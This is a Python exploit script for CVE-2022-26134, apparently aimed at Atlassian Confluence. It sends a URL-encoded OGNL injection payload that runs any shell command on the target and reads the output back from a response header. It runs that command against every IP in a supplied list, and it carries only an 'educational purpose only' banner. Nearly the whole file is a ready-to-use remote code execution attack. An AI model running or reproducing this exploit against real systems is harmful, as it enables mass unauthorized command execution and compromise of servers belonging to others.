CVE-2022-26134.py

from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()

def banner():
  CVE_2022_26134Logo = """
   _______    ________                                
  / ____/ |  / / ____/                                
 / /    | | / / __/                                   
/ /___  | |/ / /___                                   
\____/  |___/_____/___       ___   _____________ __ __
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/
/____/\____/____/____/    /____/\____/_//____/  /_/   
                                                      
  
FOR EDUCATIONAL PURPOSE ONLY.   


Execute command if ip is vulnerable      
  """
  return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))

def check_target_version(host):

  try:
    response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
    if response.status_code == 200:
      filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
      
      if len(filter_version) >= 1:
        version = filter_version[0].split("'>")[1].split('</')[0]
        return version
      else:
        return 0
    else:
      return host
  except:
    return False


def send_payload(host, command):
    
    payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)

    response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
    
    try:
      if response.status_code == 302:
          return response.headers["X-Cmd-Response"]
      else:
          return "0"
    except:
      return "0"



def main():
  banner()
  if len(sys.argv) < 3:
    print("\033[1;94mHow to use:\033[1;m")
    print("ex: python3 {} list_of_ip id".format(sys.argv[0]))

    return

  
  target = sys.argv[1]
  cmd = sys.argv[2]


  for ip in open(target, "r"):
        try:
            exec_payload = send_payload(ip.strip(), cmd)
            if exec_payload != "0":
                print("IP: " + ip.strip() + "  " + exec_payload)
        except:
            pass

if __name__ == "__main__":
   main()